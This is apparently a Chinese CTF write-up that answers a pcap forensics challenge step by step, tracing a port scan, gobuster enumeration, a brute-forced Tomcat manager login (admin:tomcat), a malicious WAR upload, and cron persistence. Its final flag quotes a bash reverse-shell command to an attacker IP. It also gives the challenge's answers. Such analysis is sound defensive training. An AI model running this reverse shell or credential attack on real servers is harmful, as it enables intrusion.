Q1 问题 鉴于在 Web 服务器上检测到的可疑活动,pcap 分析显示跨各种端口的一系列请求,表明可能存在扫描行为。您能否确定负责在我们的服务器上发起这些请求的源 IP 地址?
这题的要求是让我们分析确定黑客扫描端口的机子,一般扫描端口的话都会有大量的syn握手包
这里全是扫描端口的数据包那就是他了
flag{14.0.0.120}
Q2 问题 根据已识别的与攻击者关联的 IP 地址,您能否确定攻击者的活动来源城市?
确定攻击来源的城市我们直接溯源看看ip在哪
应该是广州GUANGZHOU
flag{GUANGZHOU}
Q3 问题 从 pcap 分析中,由于攻击者的活动扫描,检测到多个开放端口。这些端口中的哪些端口提供对 Web 服务器管理面板的访问?
一般来说web的访问端口就是80,443,8080 8443 一个一个试试呗
最后试8080的时候成功了
flag{8080}
Q4 问题 在我们的服务器上发现开放端口后,攻击者似乎试图枚举和发现我们 Web 服务器上的目录和文件。您可以从分析中识别出哪些工具在此枚举过程中帮助攻击者?
这里的意思就是看看黑客使用的目录扫描的工具是什么,
ua头里面有信息
flag{gobuster}
Q5 问题 在他们努力枚举我们 Web 服务器上的目录之后,攻击者发出了大量请求,试图识别管理界面。攻击者能够发现与管理面板关联的哪个特定目录?
这个的意思应该是网站的是使用什么搭建的或者是黑客爆破的目录也就是黑客最后想干嘛的目录
我们看看
传🐎进去了
flag{/manager}
Q6 问题 在访问管理面板时,攻击者尝试暴力破解登录凭据。从数据中,您能否识别出攻击者成功用于授权的正确用户名和密码组合?
登录凭证这个的意思应该是最黑客成功登录的账号和密码,tomcat的登录的信息放在了请求包中关键字是Authorization:Basic我们搜索一下
那应该就是这个了后面开始操作了
flag{admin:tomcat}
Q7 问题 进入管理面板后,攻击者试图上传文件,意图建立反向 shell。您能否从捕获的数据中识别出此恶意文件的名称?
这个在前面我们就已经知道了
flag{JXQOZY.war}
Q8 问题 在我们的服务器上成功建立反向 shell 后,攻击者旨在确保在受感染的机器上持久存在。根据分析,您能否确定他们计划运行的特定命令以保持其存在?
这里的意思就是黑客是如何持久化的这里有一个技巧就是我们可以使用那个过滤式然后流量从黑客上传的shell开始网下看就完事了
frame.time_relative >= 547.381269
一个定时任务持久化连接
flag{/bin/bash -c 'bash -i >& /dev/tcp/14.0.0.120/443 0>&1'}
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
